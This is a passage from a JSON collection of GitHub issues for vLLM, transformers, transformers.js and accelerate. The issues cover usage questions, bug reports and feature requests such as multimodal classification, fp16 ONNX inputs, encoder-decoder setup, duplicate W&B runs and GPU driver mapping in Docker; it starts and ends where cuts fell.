\"model\": model_name,\n \"input\": prompts,\n }\n\n classify_response = post_http_request(payload=payload, api_url=api_url)\n pprint.pprint(classify_response.json())\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n```\n\nbut if I replace the prompts with multimodal data, the server doesn't work.\n```\nvideo_url = \"https://js-ad.a.yximgs.com/bs2/ad_nieuwland-material/t2i2v/videos/3525031242883943515-140276939618048_24597237897733_v0_1759927515165406_3.mp4\"\n\n prompts = [\n {\"role\": \"user\", \"content\": [\n {\"type\": \"text\", \"text\": \"\u4f60\u662f\u4e00\u4e2a\u4e13\u4e1a\u7684\u89c6\u9891\u8d28\u91cf\u5206\u6790\u5e08\uff0c\u8bf7\u4f60\u4ed4\u7ec6\u5224\u65ad\u4e0b\u65b9\u63d0\u4f9b\u7684\u89c6\u9891\u662f\u5426\u5b58\u5728\u8d28\u91cf\u95ee\u9898\\n\u8d28\u91cf\u95ee\u9898\u5305\u62ec\u4f46\u4e0d\u9650\u4e8e\uff1a\\n1.\u753b\u9762\u8d28\u91cf\u5dee,\u753b\u9762\u6a21\u7cca\uff0c\u4eae\u5ea6\u95ea\u70c1\\n2.\u753b\u9762\u4e2d\u6587\u5b57\u5b58\u5728\u6a21\u7cca\u95ee\u9898\\n3.\u89c6\u9891\u753b\u9762\u4e0d\u7b26\u5408\u771f\u5b9e\u7269\u7406\u903b\u8f91\uff0c\u4f8b\u5982\u51ed\u7a7a\u4ea7\u751f\u7684\u4eba\u7269\u80a2\u4f53\u3001\u5934\u50cf\u3001\u624b\u6307\u624b\u81c2\u6570\u91cf\u4e0d\u5bf9\uff0c\u817f\u90e8\u4e0d\u81ea\u7136\u7b49\u95ee\u9898\\n4.\u753b\u9762\u8fd0\u52a8\u4e0d\u7b26\u5408\u7269\u7406\u89c4\u5f8b\uff0c\u4f8b\u5982\u51ed\u7a7a\u4ea7\u751f\u7684\u7269\u4f53\uff0c\u753b\u9762\u5361\u987f\u3001\u6643\u52a8\u3001\u6296\u52a8\u3001\u8df3\u52a8\u7b49\\n\\n\u5982\u679c\u89c6\u9891\u5b58\u5728\u95ee\u9898\u8bf7\u8fd4\u56de0\uff0c\u5982\u679c\u89c6\u9891\u4e0d\u5b58\u5728\u95ee\u9898\u8bf7\u8fd4\u56de1\u3002\\n## \u89c6\u9891\u5185\u5bb9\u5982\u4e0b\\n\"},\n {\"type\": \"video\", \"video\": f\"{video_url}\"},\n ]\n }\n ]\n\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you 
already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27413", "state": "open", "labels": [ "good first issue", "usage" ], "created_at": "2025-10-23T12:32:25Z", "updated_at": "2025-10-25T00:18:54Z", "comments": 12, "user": "muziyongshixin" }, { "repo": "huggingface/transformers.js", "number": 1447, "title": "How to use half precision ONNX models?", "body": "### Question\n\nHi,\n\nI just exported a detection model with fp16 using optimum.\n`--dtype fp16 `\n\nThis is my pipeline:\n\n```javascript\nconst model = await AutoModel.from_pretrained(\n \"./onnx_llama\",\n { dtype: \"fp16\", device: \"cpu\" }\n);\nconst processor = await AutoProcessor.from_pretrained(\"./onnx_llama\");\nconst buffer = await fs.readFile(\"image3.jpg\");\nconst blob = new Blob([buffer]);\n\nconst image = await RawImage.fromBlob(blob);\nconst { pixel_values, reshaped_input_sizes } = await processor(image);\nconst { output0 } = await model({ pixel_values }); // fails: model expects tensor(float16)\n```\nUsing this results in:\nAn error occurred during model execution: \"Error: Unexpected input data type. Actual: (tensor(float)) , expected: (tensor(float16))\".\n\nWhich makes sense; however, when I try to convert to fp16 \"manually\"\n\n```javascript\nconst fp16data = Float16Array.from(pixel_values.data); //float32ArrayToUint16Array(pixel_values.data);\nconst tensor = new Tensor(\"float16\", fp16data, pixel_values.dims);\nconst { output0 } = await model({ pixel_values:tensor });\n```\n\nI get:\n`Tensor.data must be a typed array (4) for float16 tensors, but got typed array (0).`\n\nWhat's going on here? I tried converting the `pixel_values.data` to a Uint16Array manually, but that has no effect, as it gets converted to a Float16Array in the tensor constructor anyway.\n\nHelp is much appreciated!\n\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/1447", "state": "open", "labels": [ "question" ], "created_at": "2025-10-23T09:18:26Z", "updated_at": "2025-10-23T09:18:26Z", "user": "richarddd" }, { "repo": "huggingface/transformers", "number": 41810, "title": "How do you use t5gemma decoder with a different encoder?", "body": "I am trying to combine the t5gemma decoder with a pretrained deberta encoder that I have trained from scratch using `EncoderDecoderModel`. \n\nHere is the code:\n\n```\nmodel_1 = \"WikiQuality/pre_filtered.am\"\nmodel_2 = \"google/t5gemma-2b-2b-ul2\"\n\nencoder = AutoModel.from_pretrained(model_1)\ndecoder = AutoModel.from_pretrained(model_2, dtype=torch.bfloat16)\n\nmodel = EncoderDecoderModel(encoder=encoder, decoder=decoder)\n```\n\nThe above code raises the error:\n```\nAttributeError: 'T5GemmaConfig' object has no attribute 'hidden_size'\n```\n\nFrom this I understand that `hidden_size` is accessible from `decoder.config.decoder.hidden_size` and not `decoder.config.hidden_size`, which is where EncoderDecoderModel is looking. So I changed my code to load the encoder-decoder model like this:\n\n```\nmodel = EncoderDecoderModel(encoder=encoder, decoder=decoder.decoder)\n```\nThis gives me the following error:\n\n```\nValueError: Unrecognized model identifier: t5_gemma_module. 
Should contain one of aimv2, aimv2_vision_model, albert, align, altclip, apertus, arcee, aria, aria_text, audio-spectrogram-transformer, autoformer, aya_vision, bamba, bark, bart, beit, bert, bert-generation, big_bird, bigbird_pegasus, biogpt, bit, bitnet, blenderbot, blenderbot-small, blip, blip-2, blip_2_qformer, bloom, blt, bridgetower, bros, camembert, canine, chameleon, chinese_clip, chinese_clip_vision_model, clap, clip, clip_text_model, clip_vision_model, clipseg, clvp, code_llama, codegen, cohere, cohere2, cohere2_vision, colpali, colqwen2, conditional_detr, convbert, convnext, convnextv2, cpmant, csm, ctrl, cvt, d_fine, dab-detr, dac, data2vec-audio, data2vec-text, data2vec-vision, dbrx, deberta, deberta-v2, decision_transformer, deepseek_v2, deepseek_v3, deepseek_vl, deepseek_vl_hybrid, deformable_detr, deit, depth_anything, depth_pro, deta, detr, dia, diffllama, dinat, dinov2, dinov2_with_registers, dinov3_convnext, dinov3_vit, distilbert, doge, donut-swin, dots1, dpr, dpt, edgetam, edgetam_video, edgetam_vision_model, efficientformer, efficientloftr, efficientnet, electra, emu3, encodec, encoder-decoder, eomt, ernie, ernie4_5, ernie4_5_moe, ernie_m, esm, evolla, exaone4, falcon, falcon_h1, falcon_mamba, fastspeech2_conformer, fastspeech2_conformer_with_hifigan, flaubert, flava, flex_olmo, florence2, fnet, focalnet, fsmt, funnel, fuyu, gemma, gemma2, gemma3, gemma3_text, gemma3n, gemma3n_audio, gemma3n_text, gemma3n_vision, git, glm, glm4, glm4_moe, glm4v, glm4v_moe, glm4v_moe_text, glm4v_text, glpn, got_ocr2, gpt-sw3, gpt2, gpt_bigcode, gpt_neo, gpt_neox, gpt_neox_japanese, gpt_oss, gptj, gptsan-japanese, granite, granite_speech, granitemoe, granitemoehybrid, granitemoeshared, granitevision, graphormer, grounding-dino, groupvit, helium, hgnet_v2, hiera, hubert, hunyuan_v1_dense, hunyuan_v1_moe, ibert, idefics, idefics2, idefics3, idefics3_vision, ijepa, imagegpt, informer, instructblip, instructblipvideo, internvl, internvl_vision, jamba, janus, jetmoe, jukebox, kosmos-2, kosmos-2.5, kyutai_speech_to_text, layoutlm, layoutlmv2, layoutlmv3, led, levit, lfm2, lfm2_vl, lightglue, lilt, llama, llama4, llama4_text, llava, llava_next, llava_next_video, llava_onevision, longcat_flash, longformer, longt5, luke, lxmert, m2m_100, mamba, mamba2, marian, markuplm, mask2former, maskformer, maskformer-swin, mbart, mctct, mega, megatron-bert, metaclip_2, mgp-str, mimi, minimax, ministral, mistral, mistral3, mixtral, mlcd, mllama, mm-grounding-dino, mobilebert, mobilenet_v1, mobilenet_v2, mobilevit, mobilevitv2, modernbert, modernbert-decoder, moonshine, moshi, mpnet, mpt, mra, mt5, musicgen, musicgen_melody, mvp, nat, nemotron, nezha, nllb-moe, nougat, nystromformer, olmo, olmo2, olmo3, olmoe, omdet-turbo, oneformer, open-llama, openai-gpt, opt, ovis2, owlv2, owlvit, paligemma, parakeet, parakeet_ctc, parakeet_encoder, patchtsmixer, patchtst, pegasus, pegasus_x, perceiver, perception_encoder, perception_lm, persimmon, phi, phi3, phi4_multimodal, phimoe, pix2struct, pixtral, plbart, poolformer, pop2piano, prompt_depth_anything, prophetnet, pvt, pvt_v2, qdqbert, qwen2, qwen2_5_omni, qwen2_5_vl, qwen2_5_vl_text, qwen2_audio, qwen2_audio_encoder, qwen2_moe, qwen2_vl, qwen2_vl_text, qwen3, qwen3_moe, qwen3_next, qwen3_omni_moe, qwen3_vl, qwen3_vl_moe, qwen3_vl_moe_text, qwen3_vl_text, rag, realm, recurrent_gemma, reformer, regnet, rembert, resnet, retribert, roberta, roberta-prelayernorm, roc_bert, roformer, rt_detr, rt_detr_resnet, rt_detr_v2, rwkv, sam, sam2, sam2_hiera_det_model, sam2_video, 
sam2_vision_model, sam_hq, sam_hq_vision_model, sam_vision_model, seamless_m4t, seamless_m4t_v2, seed_oss, segformer, seggpt, sew, sew-d, shieldgemma2, siglip, siglip2, siglip2_vision_model, siglip_vision_model, smollm3, smolvlm, smolvlm_vision, speech-encoder-decoder, speech_to_text, speech_to_text_2, speecht5, splinter, squeezebert, stablelm, starcoder2, superglue, superpoint, swiftformer, swin, swin2sr, swinv2, switch_transformers, t5, t5gemma, table-transformer, tapas, textnet, tim", "url": "https://github.com/huggingface/transformers/issues/41810", "state": "closed", "labels": [], "created_at": "2025-10-23T08:48:19Z", "updated_at": "2025-12-01T08:02:53Z", "comments": 1, "user": "kushaltatariya" }, { "repo": "huggingface/accelerate", "number": 3818, "title": "Duplicate W&B initialization in offline mode", "body": "### System Info\n\n```Shell\n- `Accelerate` version: 1.10.1\n```\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using Accelerate with `wandb` in **offline mode**, two separate W&B runs are created for a single training process.\nThis happens because both the `start` and the `store_init_configuration` method of `WandBTracker` call `wandb.init()`, which leads to redundant initialization. \n\nhttps://github.com/huggingface/accelerate/blob/a12beee389f6bd37cfae0aba233db03f375f7f80/src/accelerate/tracking.py#L318-L325\n\nhttps://github.com/huggingface/accelerate/blob/a12beee389f6bd37cfae0aba233db03f375f7f80/src/accelerate/tracking.py#L343-L350\n\nIs there any plan to refine the duplication?\n\n### Expected behavior\n\ninitialize wandb run only 1 time", "url": "https://github.com/huggingface/accelerate/issues/3818", "state": "closed", "labels": [ "good first issue" ], "created_at": "2025-10-23T02:19:38Z", "updated_at": "2025-12-16T13:10:48Z", "comments": 3, "user": "ShuyUSTC" }, { "repo": "vllm-project/vllm", "number": 27347, "title": "[Usage]: vllm: error: unrecognized arguments: --all2all-backend deepep_low_latency", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.31.6\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.0 (default, Mar 3 2022, 09:58:08) [GCC 7.5.0] (64-bit runtime)\nPython platform : Linux-5.15.0-89-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H200\nGPU 1: NVIDIA H200\nGPU 2: NVIDIA H200\nGPU 3: NVIDIA H200\nGPU 4: NVIDIA H200\nGPU 5: NVIDIA H200\nGPU 6: NVIDIA H200\nGPU 7: NVIDIA H200\n\nNvidia driver version : 570.133.20\ncuDNN version : Probably one of the 
following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0\nOff-line CPU(s) list: 1-191\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8558\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 76%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 520 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mit", "url": "https://github.com/vllm-project/vllm/issues/27347", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-22T14:36:18Z", "updated_at": "2025-10-22T15:07:13Z", "comments": 1, "user": "Valerianding" }, { "repo": "vllm-project/vllm", "number": 27343, "title": "[Usage]: Can't get result from /pooling api when using Qwen2.5-Math-PRM-7B online", "body": "### Your current environment\n\n```\n\nThe output of `python collect_env.py`\n\nCollecting environment information... 
[140/1781]\n============================== \n System Info \n============================== \nOS : Ubuntu 22.04.5 LTS (x86_64) \nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0 \nClang version : Could not collect \nCMake version : version 3.22.1 \nLibc version : glibc-2.35 \n \n============================== \n PyTorch Info \n============================== \nPyTorch version : 2.8.0+cu128 \nIs debug build : False \nCUDA used to build PyTorch : 12.8 \nROCM used to build PyTorch : N/A \n \n============================== \n Python Environment \n============================== \nPython version : 3.12.12 | packaged by Anaconda, Inc. | (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runti\nme) \nPython platform : Linux-5.15.0-153-generic-x86_64-with-glibc2.35 \n \n============================== \n CUDA / GPU Info \n============================== \nIs CUDA available : True \nCUDA runtime version : 12.4.99\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100 80GB PCIe\nGPU 1: NVIDIA A100 80GB PCIe\nGPU 2: NVIDIA A800 80GB PCIe\nGPU 3: NVIDIA A800 80GB PCIe\nGPU 4: NVIDIA A100 80GB PCIe\nGPU 5: NVIDIA A100 80GB PCIe\nGPU 6: NVIDIA A800 80GB PCIe\nGPU 7: NVIDIA A800 80GB PCIe\n\nNvidia driver version : 550.54.15\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n============================== \n CPU Info \n============================== \nArchitecture: x86_64 \nCPU op-mode(s): 32-bit, 64-bit \nAddress sizes: 46 bits physical, 48 bits virt", "url": "https://github.com/vllm-project/vllm/issues/27343", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-22T13:36:51Z", "updated_at": "2025-10-23T03:39:13Z", "comments": 3, "user": "zgc6668" }, { "repo": "huggingface/transformers.js", "number": 1446, "title": "Zhare-AI/sd-1-5-webgpu on HuggingFace.co lists itself as Transformer.js supported?", "body": "### Question\n\n[Zhare-AI/sd-1-5-webgpu](https://huggingface.co/Zhare-AI/sd-1-5-webgpu) is a `text-to-image` model and is marked as Transformers.js compatible, and even shows demo code using Transformers.js on its `huggingface.co` page. Their example code fails with an error saying `text-to-image` is not supported in Transformers.js.\n\nThe problem is `text-to-image` is not supported in 3.7.6 and does not appear to even be supported in the v4 branch. I asked them on their `huggingface.co` discussions what version of Transformers.js their model is compatible with but no reply yet. Apparently someone else asked them the same thing 18 days ago and never got a reply.\n\nI am very interested adding a Transformers.js demo for `text-to-image` to my Blazor WASM library [SpawnDev.BlazorJS.TransformersJS](https://github.com/LostBeard/SpawnDev.BlazorJS.TransformersJS), but not sure what I am missing.", "url": "https://github.com/huggingface/transformers.js/issues/1446", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-22T12:20:16Z", "updated_at": "2025-10-24T14:33:17Z", "user": "LostBeard" }, { "repo": "vllm-project/vllm", "number": 27336, "title": "[Feature]: Make promt_token_ids optional in streaming response (disable by default)", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nStarting with v0.10.2, the first server-sent event (SSE) in streaming responses now includes the full list of `prompt_token_ids`.\nWhile this can be useful for debugging or detailed inspection, it introduces several practical issues in production environments: \n\n1. 
Large payload size: \nFor long prompts, this significantly increases the size of the first streaming event. This can increase latency, cause network throttling, and reduce streaming responsiveness.\n\n2. Parser and infrastructure limitations: \nSome clients and intermediate parsers have message size limits. The larger first event may cause them to fail or disconnect, requiring changes across multiple components in existing systems that previously handled smaller initial events.\n\n3. Breaking change in behavior:\nPreviously, streaming responses did not include prompt token IDs, so this change affects compatibility with existing clients expecting smaller events.\n\n\n### Suggested Fix\nMake the inclusion of prompt_token_ids optional per request and disabled by default (same as `return_token_ids`), restoring the previous behavior.\n\n\n### Alternatives\n\nAlternatively, provide an API flag or configuration option to exclude `prompt_token_ids` globally for the entire server, so that no streaming response includes this field.\n\n### Additional context\n\nFor example, the first streaming response for a prompt of ~130k tokens can now exceed 600KB, while some parsers and scanners have default buffer sizes of 64KB (which was previously sufficient).\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27336", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-22T11:42:41Z", "updated_at": "2025-10-27T11:06:45Z", "comments": 1, "user": "Gruner-atero" }, { "repo": "huggingface/transformers", "number": 41775, "title": "Hugging Face website and models not reachable", "body": "### System Info\n\n```\n$ pip show transformers\nName: transformers\nVersion: 4.57.1\nSummary: State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow\nHome-page: https://github.com/huggingface/transformers\nAuthor: The Hugging Face team (past and future) with the help of all our contributors (https://github.com/huggingface/transformers/graphs/contributors)\nAuthor-email: transformers@huggingface.co\n```\n\n```\n$ python --version\nPython 3.12.3\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1. `python -c 'from transformers import pipeline; pipeline = pipeline(task=\"text-generation\", model=\"Qwen/Qwen2.5-1.5B\")'`\n\nI am getting connection issues:\n```\nOSError: We couldn't connect to 'https://huggingface.co' to load the files, and couldn't find them in the cached files.\nCheck your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.\n```\n\nIt is rather funny that it recommends checking https://huggingface.co/docs/transformers/installation#offline-mode when https://huggingface.co is not reachable :-) Maybe this information, e.g. 
about mirrors, could be hosted somewhere else?\n\n### Expected behavior\n\nThe examples should work as documented.", "url": "https://github.com/huggingface/transformers/issues/41775", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-22T07:40:32Z", "updated_at": "2025-11-21T08:10:00Z", "comments": 8, "user": "christian-rauch" }, { "repo": "vllm-project/vllm", "number": 27319, "title": "[Usage]: Quantized FusedMoE crashed in graph compiled stage", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : 19.0.0git (https://github.com/RadeonOpenCompute/llvm-project roc-6.4.3 25224 d366fa84f3fdcbd4b10847ebd5db572ae12a34fb)\nCMake version : version 3.31.6\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+rocm6.4\nIs debug build : False\nCUDA used to build PyTorch : N/A\nROCM used to build PyTorch : 6.4.43482-0f2d60242\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by conda-forge | (main, Jun 4 2025, 14:45:31) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-79-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : AMD Radeon PRO W7900 Dual Slot (gfx1100)\nNvidia driver version : Could not collect\ncuDNN version : Could not collect\nHIP runtime version : 6.4.43482\nMIOpen runtime version : 3.4.0\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 256\nOn-line CPU(s) list: 0-255\nVendor ID: AuthenticAMD\nBIOS Vendor ID: Advanced Micro Devices, Inc.\nModel name: AMD EPYC 9554 64-Core Processor\nBIOS Model name: AMD EPYC 9554 64-Core Processor Unknown CPU @ 3.1GHz\nBIOS CPU family: 107\nCPU family: 25\nModel: 17\nThread(s) per core: 2\nCore(s) per socket: 64\nSocket(s): 2\nStepping: 1\nFrequency boost: enabled\nCPU(s) scaling MHz: 51%\nCPU max MHz: 3100.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 6199.71\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good amd_lbr_v2 nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba perfmon_v2 ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local user_shstk avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin cppc amd_ibpb_ret arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif x2avic v_spec_ctrl vnmi avx512vbmi umip pku ospke 
avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid overflow_recov succor smca fsrm flush_l1d debug_swap\nVirtualization: AMD-V\nL1d cache: 4 MiB (128 instances)\nL1i cache: 4 MiB (128 instances)\nL2 cache: 128 MiB (128 instances)\nL3 cache: 512 MiB (16 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-63,128-191\nNUMA node1 CPU(s): 64-127,192-255\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: ", "url": "https://github.com/vllm-project/vllm/issues/27319", "state": "closed", "labels": [ "rocm", "usage" ], "created_at": "2025-10-22T06:29:32Z", "updated_at": "2025-10-24T02:19:55Z", "comments": 1, "user": "Rus-P" }, { "repo": "vllm-project/vllm", "number": 27298, "title": "[Doc]: Update metrics documentation to remove V0 references and add v1 changes.", "body": "## Problem\n\nThe metrics documentation in `docs/design/metrics.md` still contains references to V0 metrics implementation, but V0 metrics have been removed after @njhill 's PR https://github.com/vllm-project/vllm/pull/27215 was merged. To avoid confusion, I think we should remove this and update it with the new set of v1 metrics.\n\nWas curious if we want to keep this v0 reference and add the v1 details on top of this. \n\n### Suggest a potential alternative/fix\n\n1. Remove all V0 references from the metrics documentation.\n2. Update the introduction to focus on V1 metrics only.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27298", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-21T22:08:48Z", "updated_at": "2025-10-22T13:29:17Z", "comments": 1, "user": "atalhens" }, { "repo": "vllm-project/vllm", "number": 27268, "title": "[Usage]: failed to infer device type on GCP COS despite nvidia container toolkit installed", "body": "### Your current environment\n\nI failed to run this script on GCP COS. \n\n### How would you like to use vllm\n\nI was trying to use VLLM on a Google Cloud (GCP) Container-Optimized OS (COS) instance via Docker. \n\nI followed GCP's [documentation](https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus) to install the nvidia driver, including mapping nvidia driver-related dirs to the Docker container. All tests worked fine. \n\nHowever, when trying to start a VLLM server via Docker, I got the error that `libcuda.so.1` cannot be found and VLLM failed to infer device info. I tried to change the target dirs in the mapping to like `/usr/local/lib`, `/usr/local/cuda/lib`, etc. But no luck. 
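For reference, this is the shape of the mapping I was attempting (a sketch only; the /var/lib/nvidia paths follow GCP's COS GPU guide, and the exact device flags are assumptions about my setup):\n\n```\ndocker run \\\n  --volume /var/lib/nvidia/lib64:/usr/local/nvidia/lib64 \\\n  --volume /var/lib/nvidia/bin:/usr/local/nvidia/bin \\\n  --device /dev/nvidia0 --device /dev/nvidiactl --device /dev/nvidia-uvm \\\n  --env LD_LIBRARY_PATH=/usr/local/nvidia/lib64 \\\n  -v ~/.cache/huggingface:/root/.cache/huggingface \\\n  -p 8010:8000 --ipc=host \\\n  vllm/vllm-openai:latest --model mistralai/Mistral-7B-v0.1\n```\n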
